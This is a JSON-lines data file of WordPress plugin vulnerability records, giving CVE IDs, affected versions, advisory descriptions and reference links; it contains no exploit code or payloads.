{"CVE_ID":"CVE-2024-9521","slug":"seo-manager","versionImpact":"1.9","description":"The SEO Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post meta in versions up to, and including, 1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17457ff2-917d-4cc4-8c5e-c80cd320cc90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17457ff2-917d-4cc4-8c5e-c80cd320cc90?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-manager\\\/trunk\\\/seo-manager.php?rev=2963205#L458\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-manager\\\/trunk\\\/seo-manager.php?rev=2963205#L458\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9165","slug":"gift-voucher","versionImpact":"4.4.4","description":"The Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dfbee4c-b720-4d10-bfe0-fe9dc12e6268?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dfbee4c-b720-4d10-bfe0-fe9dc12e6268?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gift-voucher\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gift-voucher\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/giftcard.php#L515\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gift-voucher\\\/trunk\\\/giftcard.php#L515\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8157","slug":"alphabetical-list","versionImpact":"1.0.3","description":"The Alphabetical List WordPress plugin through 1.0.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9bc18c41-fc4c-48c9-bcec-323c502ae620\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9bc18c41-fc4c-48c9-bcec-323c502ae620\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13853","slug":"seo-automatic-seo-tools","versionImpact":"4.0.7","description":"The SEO Tools WordPress plugin through 4.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52991dd9-41f7-4cf8-b8c9-56dd4e62bf0c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52991dd9-41f7-4cf8-b8c9-56dd4e62bf0c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11843","slug":"project-panorama-lite","versionImpact":"1.5.1","description":"The Panorama  WordPress plugin through 1.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dd41559-d88a-4018-a0f0-c8944b6d6f0a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dd41559-d88a-4018-a0f0-c8944b6d6f0a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7668","slug":"linux-promotional-plugin","versionImpact":"1.4","description":"The Linux Promotional Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the 'inux-promotional-plugin.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linux-promotional-plugin\\\/trunk\\\/linux-promotional-plugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/linux-promotional-plugin\\\/trunk\\\/linux-promotional-plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/linux-promotional-plugin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/linux-promotional-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a3e3d91-5ce5-4db1-856e-c1d12471f9ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a3e3d91-5ce5-4db1-856e-c1d12471f9ed?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4389","slug":"wp-travel","versionImpact":"4.4.6","description":"The WP Travel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.4.6. This is due to missing or incorrect nonce validation on the save_meta_data() function. This makes it possible for unauthenticated attackers to save metadata for travel posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28dea1e9-e772-488e-b98f-93a46ab84581?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28dea1e9-e772-488e-b98f-93a46ab84581?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2477827\\\/wp-travel\\\/tags\\\/4.4.7\\\/inc\\\/admin\\\/class-admin-metaboxes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2477827\\\/wp-travel\\\/tags\\\/4.4.7\\\/inc\\\/admin\\\/class-admin-metaboxes.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4954","slug":"waiting","versionImpact":"0.6.2","description":"The Waiting: One-click countdowns plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown name in versions up to, and including, 0.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ef5b0de-0b8b-4286-86ea-6dca0dbc1a52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ef5b0de-0b8b-4286-86ea-6dca0dbc1a52?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waiting\\\/trunk\\\/waiting.php?rev=2826039\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2707","slug":"gAppointments","versionImpact":"1.9.5.1","description":"The gAppointments WordPress plugin through 1.9.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5664da4-5b78-4e42-be6b-e0d7b73a85b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5664da4-5b78-4e42-be6b-e0d7b73a85b0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3628","slug":"easyevent","versionImpact":"1.0.0","description":"The EasyEvent WordPress plugin through 1.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/171af8eb-ceeb-403a-abc2-969d9535a4c9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/171af8eb-ceeb-403a-abc2-969d9535a4c9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3831","slug":"enteraddons","versionImpact":"2.1.5","description":"The Enter Addons \u2013 Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Heading widget in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62a4dd6a-f970-483e-b1a8-d57f604b7b66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62a4dd6a-f970-483e-b1a8-d57f604b7b66?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/enteraddons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3921","slug":"gianism","versionImpact":"5.1.0","description":"The Gianism WordPress plugin through 5.1.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c114e14-9113-411d-91f3-2e2daeb40739\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c114e14-9113-411d-91f3-2e2daeb40739\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7061","slug":"file-manager-advanced-shortcode","versionImpact":"2.5.3","description":"The Advanced File Manager Shortcodes plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 2.5.3. This makes it possible for authenticated attackers with contributor access or above to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26050f70-7a10-4df5-acd5-1c9e7613bf2c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26050f70-7a10-4df5-acd5-1c9e7613bf2c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advancedfilemanager.com\\\/product\\\/file-manager-advanced-shortcode-wordpress\\\/\",\"name\":\"https:\\\/\\\/advancedfilemanager.com\\\/product\\\/file-manager-advanced-shortcode-wordpress\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6152","slug":"flipbox-builder","versionImpact":"1.5","description":"The Flipbox Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.5 via deserialization of untrusted input in the flipbox_builder_Flipbox_ShortCode function. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9cd38a-b2cd-4801-a06b-4e965fa72e04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e9cd38a-b2cd-4801-a06b-4e965fa72e04?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flipbox-builder\\\/trunk\\\/template-front\\\/shortcode.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/flipbox-builder\\\/trunk\\\/template-front\\\/shortcode.php#L30\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6804","slug":"jeg-elementor-kit","versionImpact":"2.6.7","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5491ff65-9060-4b0b-a31d-7b95ea581310?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5491ff65-9060-4b0b-a31d-7b95ea581310?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.7\\\/lib\\\/jeg-framework\\\/customizer\\\/class-customizer.php#L595\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.7\\\/lib\\\/jeg-framework\\\/customizer\\\/class-customizer.php#L595\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jeg-elementor-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139386\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139386\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8436","slug":"wp-easy-gallery","versionImpact":"4.8.5","description":"The WP Easy Gallery \u2013 WordPress Gallery Plugin plugin for WordPress is vulnerable to SQL Injection via the 'edit_imageId' and 'edit_imageDelete' parameters in all versions up to, and including, 4.8.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6eb094a-4f5a-418a-ba95-635765abfcff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6eb094a-4f5a-418a-ba95-635765abfcff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L730\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L730\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12155","slug":"sv100-companion","versionImpact":"2.0.02","description":"The SV100 Companion plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the settings_import() function in all versions up to, and including, 2.0.02. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sv100-companion\\\/trunk\\\/lib\\\/modules\\\/sv_settings\\\/sv_settings.php#L47\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sv100-companion\\\/trunk\\\/lib\\\/modules\\\/sv_settings\\\/sv_settings.php#L47\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c244eb33-acaf-460b-ae1d-6688b21cc60f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c244eb33-acaf-460b-ae1d-6688b21cc60f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12535","slug":"host-php-info","versionImpact":"1.0.4","description":"The Host PHP Info plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check when including the 'phpinfo' function in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to read configuration settings and predefined variables on the site's server. The plugin does not need to be activated for the vulnerability to be exploited.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/host-php-info\\\/trunk\\\/info.php#L2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/host-php-info\\\/trunk\\\/info.php#L2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88d27385-9b92-419c-9e03-687d7192bbb5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88d27385-9b92-419c-9e03-687d7192bbb5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13683","slug":"automate-hub-free-by-sperse-io","versionImpact":"1.7.0","description":"The Automate Hub Free by Sperse.IO plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.0. This is due to missing or incorrect nonce validation on the 'automate_hub' page. This makes it possible for unauthenticated attackers to update an activation status via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/trunk\\\/apps\\\/s\\\/sperse\\\/sperse.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/trunk\\\/apps\\\/s\\\/sperse\\\/sperse.php#L141\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automate-hub-free-by-sperse-io\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automate-hub-free-by-sperse-io\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6d90ca3-dc24-4634-9f98-83a909e3e093?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6d90ca3-dc24-4634-9f98-83a909e3e093?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0181","slug":"wp-foodbakery","versionImpact":"4.8","description":"The WP Foodbakery plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.7. This is due to the plugin not properly validating a user's identity prior to setting the current user and their authentication cookie. This makes it possible for unauthenticated attackers to gain access to a target user's (e.g. administrators) account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d722ec8d-bfca-4da1-8eb0-8d33735c5e44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d722ec8d-bfca-4da1-8eb0-8d33735c5e44?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1361","slug":"ip2location-country-blocker","versionImpact":"2.38.8","description":"The IP2Location Country Blocker plugin for WordPress is vulnerable to Regular Information Exposure in all versions up to, and including, 2.38.8 due to missing capability checks on the admin_init() function. This makes it possible for unauthenticated attackers to view the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ip2location-country-blocker\\\/trunk\\\/ip2location-country-blocker.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ip2location-country-blocker\\\/trunk\\\/ip2location-country-blocker.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244193\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244193\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ip2location-country-blocker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ip2location-country-blocker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b63bc2b6-1abc-4cfa-a7e5-3995640f66a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b63bc2b6-1abc-4cfa-a7e5-3995640f66a7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13836","slug":"wp-login-control","versionImpact":"2.0.0","description":"The WP Login Control WordPress plugin through 2.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26c2026a-1490-4a0f-9d1d-54ee43c69f22\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26c2026a-1490-4a0f-9d1d-54ee43c69f22\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26c2026a-1490-4a0f-9d1d-54ee43c69f22\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/26c2026a-1490-4a0f-9d1d-54ee43c69f22\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12189","slug":"wdesignkit","versionImpact":"1.2.2","description":"The WDesignKit \u2013 Elementor & Gutenberg Starter Templates, Patterns, Cloud Workspace & Widget Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom widgets in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wdesignkit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wdesignkit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e936214-ee25-4763-ba7a-b5308cc09a57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e936214-ee25-4763-ba7a-b5308cc09a57?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11719","slug":"tarteaucitron-wp","versionImpact":"0.2.5","description":"The tarteaucitron-wp WordPress plugin before 0.3.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64c2a296-5fc6-450e-a12d-75cbf8b73e3a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64c2a296-5fc6-450e-a12d-75cbf8b73e3a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
